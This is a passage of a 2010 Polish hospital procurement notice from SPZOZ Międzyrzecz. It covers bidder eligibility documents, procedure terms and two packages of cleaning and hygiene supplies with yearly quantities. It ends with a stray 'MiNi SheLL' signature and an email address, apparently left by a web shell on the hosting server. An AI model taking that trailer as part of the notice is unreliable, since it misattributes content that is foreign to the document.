2	 informacja z Krajowego Rejestru Karnego w zakresie art. 24 ust. 1 pkt 4 - 8 Prawa Zamówień Publicznych 	równoważne zaświadczenie z właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4 -8 ustawy z dnia 29 stycznia 2004 roku Prawo Zamówień Publicznych, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3	Informacja z Krajowego Rejestru Karnego w zakresie art. 24 ust. 1 pkt 9 Prawa Zamówień Publicznych	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy z dnia 29 stycznia 2004 roku Prawo Zamówień Publicznych, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, z wyłączeniem przedsiębiorców indywidualnych oraz prowadzących działalność w formie spółki cywilnej.
4	Dokumenty poświadczające sytuację ekonomicznej i finansową Wykonawcy zapewniającej wykonanie Zamówienia	każdy z Wykonawców powinien złożyć oświadczenie potwierdzające, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie Zamówienia. 
5	Zaświadczenie z właściwego organu podatkowego oraz ZUS 	Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Dokumenty wymagane:
-	formularz ofertowy z wykorzystaniem wzoru - załącznik nr 1
-	dokumenty potwierdzające uprawnienia osób podpisujących ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów rejestrowych,
.	oświadczenie Oferenta, że zapoznał się z niniejszą specyfikacją i nie wnosi żadnych zastrzeżeń oraz, że zdobył konieczne informacje do przygotowania oferty   - załącznik nr 1
.	oświadczenie Oferenta   , że zapoznał się z projektem  umowy i nie wnosi uwag - załącznik nr 1 
.	Specyfikacja asortymentowo-cewnowa.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.miedzyrzecz.spzoz.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Międzyrzeczu
ul. Konstytucji  3 Maja 35
66 - 300 Międzyrzecz
Pokój Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.04.2010 godzina 09:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej w Międzyrzeczu
ul. Konstytucji  3 Maja 35
66 - 300 Międzyrzecz
Sekretariat Szpitala.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet q.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 1
Lp	Asortyment	Jednostka miary	Ilość  w skali roku	
1.	Płyn do  mycia naczyń w zmywarkach profesionalnych z przeznaczeniem do wszystkich twardości wody, zawierający fosforany, związki wybielające na bazie chloru, wartość Ph 12,5-13,00. Wygodny w użyciu i dozowaniu granulat, nie tworzący piany. Pakowany po 10 kg, dozowanie 1-4 g/1 litr.	L	500	
2.	Środek (koncentrat) myjąco - dezynfekujący, działający na bakterie i grzyby na wszystkich powierzchniach i urządzeniach kuchennych w ciągu 5 minut, o Ph 9,5 - 10,5. Roztwór 1-2%, opakowanie 1 l, dozowany przez system PENQUIN, zgodny z normą europejską EN 1276, EN 1650, EN 13697	L 	4	
3.	Skoncentrowany płyn do usuwania osadów mineralnych,czas dezynfekcji 10-20 min, Ph 1,9 ( 1 koncentrat), temperatura 35 - 65 stopni  Celsjusza, skład - środki powierzchniowo-czynne, kwas fosforowy, kwas azotowy, zdolność do biologicznej neutralizacji, zgodny z normą ISO - 9002, kanister 5 l 	L  	10	
4.	Płyn ( koncentrat) do dezynfekcji powierzchni kuchennych, sprzętu kuchennego, zgodny z normą ISO 9002, skład - tenzydy  czwartorzędowe, zdolność do biologicznej neutralizacji, wartość Ph 10-11, opakowanie 5l, bezpieczne dozowanie przez urządzeniec dozujące, czas dezynfekcji 15 minut	L 	10	
5.	Środek do usuwania silnie zatłuszczonych i przypalonych powierzchni, lalnister 5 l, skład - amonowe i amfoteryczne związki powierzchniowo czynne, wodorotlenek sodu, 2-aminoetanol, alkiloaminotlenki, czas działania 10 - 15 minut	L 	10	
6.	Alkaliczny środek do czyszczenia posadzek kuchennych	L  	20	
7.	Preparat do mycia i dezynfekcji rąk, bez barwników i substancji zapachowych, szczególnie przydatny w kuchniach, skład - propanol, tridosan, opakowanie 1 l , dozowanie przez dozownik, chroni skórę rąk przed wysuszeniem	L  	20	
8.	Uniwersalny koncentrat czyszczący do zmywalnych powierzchni o ph 7-8	L  	30	
9.	Emulsja do powlekania posadzek szpitalnych, dajedługotrwałą powłokę polinerową, dla placówek służby zdrowia, odporny na działanie środków na bazie alkoholu i środków dezynfekcyjnych, opakowanie 5 l	L  	250	
10.	Środek myjąco - dezynfekujący do urządzeń sanitarnych, posiadający silne właściwości zmywające, wykazujący działanie baktewriobójcze, wirusobójcze, doskonale czyszczący i wybielający, czasdziałania do 15 minut, skład - anionowe i niejenowe środki powierzchniowe czynne, roztwór wodorotlenku potasu, roztwór podchlorynu sodu, substancje zapachowe, opakowanie 1 litrowe, idealny do materiałów wrażliwych na działanie kwasów, np. - fugi.	L 	50	
11.	Płyn do mycia powierzchni szklanych na bazie alkoholu, usuwający tłuste zabrudzenia, naloty i osady z nikotyny, łagodny dla skóry rąk, wartość Ph - 7, kanister 10 l	L  	150	
12.	Skoncentrowany płyn do mycia naczyń , dozowanie - ok.8 ml na 10 L wody, kanister 10 L	L  	400	
13.	Środek (koncentrat) do codziennego mycia podłóg - ręcznego i maszynowego, na bazie amoniaku, o ph - 10,5 - w kanistrach 10 L, skład- anilonowe i niejonowe tenzydy 2-7% NTA, kwas nitryloocetowy	L  	400	
14.	Zapachowy środek czyszczący do posadzek, o ph 7, na anionowych środkach powierzchniowo czynnych, w kanistrach 10 L, zapewniający trwałe uczucie świeżości i czystości, skutecznie pochłania i usówa brud, nie pozostawiający smug i powłok, może być stosowany na zakonserwowanych jk i nie zakonserwowanych powierzchniach	L  	400	
15.	Środek do czyszczenia łazienek, sanitariatów ,szybko i skutecznie usuwający osady z kamienia, mydła i rdzy, nie pozostawiający śladów i smug, konsystencji żelowej, zawierający tenzydy anionowe, organicznie kwaśny, lalnister 10 l, zapewnia długotrwały, świeży zapach	L  	40	
16.	Ściereczki duże, bardzo chłonne - z łatwym wyżymaniem, mięsiste w dotyku, o wymiarach każda - 38 cm x 40 cm, w kolorach: niebieskim, żółtym, zielonym, różowym, możliwość prania w tremp. 95 stopni, bardzo chłonne	SZT  	3000	
17.	Ściereczki małe o falistej strukturze, zwiększające przyjmowanie brudu, z domieszką mikrofazy, możliwość prania w 600 C, o wymiarach każda - 35 cm x 35c m w kolorach:niebieskim,żółtym,zielonym,czerwony, wykonane w technologii norlon ( torebki wyłapujące)	SZT  	3000	
18.	Ściereczka w rolce o szer.25 cm i dług. 10 m, w kolorze niebieskim, wysoka chłonność wody, tłuszczu, z włókien naturalnych, nie pozostawia smug, zacieków, kłaczków	SZT 	20	
19.	Gąbka do szorowania z zielonym padem ,                   format 7 x 15 cm	SZT 	400	
20.	Czyścik do szorowania trudnych zabrudzeń, nie zawiera metali, taliowany kształt	SZT  	50	
21.	Mydło w płynie, białe, w kanistrze	L 	500	
22.	Kostka w koszyczku do WC	SZT  	200	
23.	Ręczniki składane typu zz, kolor natura, karton po 5000 szt.	KARTON  	200	
24.	Dozowniki na ręczniki składane do poz. 23	SZT  	20	
25.	Papier toaletowy typu Jumbo, szary, pakowany po 12 rolek, min.130 m  p06062	OPAKOWANIE  	200	
26.	Pojemnik na papier do poz. 25	SZT 	10	
27.	Worki na odpady medyczne - LDPE, w kolorach: czerwonym, niebieskim i żółtym,        o pojemności każdy 120 litrów	OPAKOWANIE-ROLKApo 25 sztuk	2500:1000 niebieskich1000 czerwonych100 żółtych	
28.	Worki na odpady medyczne - LDPE, w kolorach: czerwonym, niebieskim i żółtym,        o pojemności każdy 60 litrów	OPAKOWANIE-ROLKApo 20 sztuk	2500:1000 niebieskich1000 czerwonych300 żółtych	
29.	Worki na odpady medyczne - LDPE, w kolorach: czerwonym, niebieskim i żółtym,        o pojemności każdy 35 litrów	OPAKOWANIE-ROLKApo 20 sztuk	2500:1000 niebieskich1000 czerwonych300 żółtych	
30.	Worki na odpady komunalne - LDPE, w kolorzeczarnym o pojemnościach: 120, 60 i 35 litrów	OPAKOWANIE-ROLKApo 20-25 sztuk	120l -200060l - 200035l- 1000	
31.	Zestaw do mycia okien, dwustronny (guma ściągająca + nakładka bawełniana), szerokość 35 cm	SZTUKA	10	
32.	Kij teleskopowy  - 2 x 1,25 do pozycji nr 31	SZTUKA	10	
33.	Ściągaczka do zbierania wody z posadzek, szer. 60 cm, kompletna z kijem	SZTUKA	10	
34.	Mopy bawełniane do stelaży - KLIK PLUS, szer. 40 cm	SZTUKA	300	
35.	Mopy bawełniane do stelaży - KLIK PLUS, szer. 50 cm	SZTUKA	300	
36.	Stelaże do mopów do pozycji nr 34	SZTUKA	10	
37.	Stelaże do mopów do pozycji nr 35	SZTUKA	10	
38.	Kije do stelaży na mopy - KLIK PLUS do pozycji nr 36	SZTUKA	10	
39.	Kije do stelaży na mopy - KLIK PLUS do pozycji nr 37	SZTUKA	10	
40	Zmiotka + szufelka - typu leniuch	Sztuka	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.95.50.00-3, 39.83.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 2

Lp.	Asortyment	Jednostka miary	Ilość  w skali roku	
1.	Szczotki ryżowe do szorowania podłóg, szer. 20-30 cm, z kijem	SZTUKA	20	
2.	Szczotka z włosiem twardym bądź mieszanym, do zamiatania, szer. 30-40 cm, z kijem 	SZTUKA	20	
3.	Zmiotka z szufelką, plastikowa	SZTUKA	15	
4.	Szczotka z pojemnikiem do toalet	SZTUKA	30	
5.	Płyn nabłyszczający do paneli	L	20	
6.	Zmywacz do pasty samopołyskowej	L	100	
7.	Środek do udrażniania rur typu kret	SZTUKA	100	
8.	Mleczko do mycia baterii kranowych	L	100	
9.	Proszek do czyszczenia typu IZO lub równoważny a 500 g	SZTUKA	200	
10.	Środek skoncentrowany do usuwania kamienia i rdzy	L	200	
11.	Płyn - żel do WC typu Tytan lub równoważny	L	300	
12.	Pianka do czyszczenia mebli a 400 ml	SZTUKA	20	
13.	Odświeżacz powietrza w sprayu a 300 ml	SZTUKA	300	
14.	Szampon dla dzieci typu Bambino a 250 ml	SZTUKA	35	
15.	Szampon dla dorosłych a 250	SZTUKA	35	
16.	Środek nabłyszczający do płukania naczyń  w zmywarkach	L	20	
17.	Sól do zmywarek	KG	50	
19	Pasta bhp- żel	Kg	90 a 0,5 kg	
20	Proszek do prania	Kg	80	
21	Płyn do płukania tkanin	L	10	
22.	Rękawice gospodarcze	OPAKOWAN a 12 szt	50	
23.	Worki do żywności 1,20 x 0,90	OPAKOWAN a 100 szt	20	
24.	Worki do żywności 0,90 x 0,60	OPAKOWAN a 100 szt	20	
25.	Woreczki śniadaniowe	OPAKOWAN a 100 szt	40	
26.	Reklamówki białe bez nadruku	OPAKOWAN a 200 szt	30	
27.	Serwetki papierowe	OPAKOWAN a 500 szt	30	
28.	Pojemnik styropianowy dwudzielny	Szt	500	
29.	Pojemnik obiadowy trójdzielny z pokrywką	OPAKOWAN a 100 szt	500	
30	Pojemnik jednorazowy 450 ml z wieczkiem	Sop.a 100 sazt	100	
31	Pojemnik jednorazowy 500ml z wieczkiem	Opakowanie a 100 szt	100	
32.	Sztućce jednorazowe:NóżWidelecŁyżkałyżeczka	OPAKOWAN a 100 szt	Po 20 opakowąn.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.71.16.10-6, 33.76.00.00-5, 33.76.30.00-6, 33.71.19.00-6, 39.81.21.00-8, 39.81.30.00-4, 39.22.40.00-8, 39.22.43.10-4, 39.22.43.30-0, 39.22.43.20-7, 33.74.12.00-8, 39.81.30.00-4, 39.22.11.30-7, 39.81.11.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com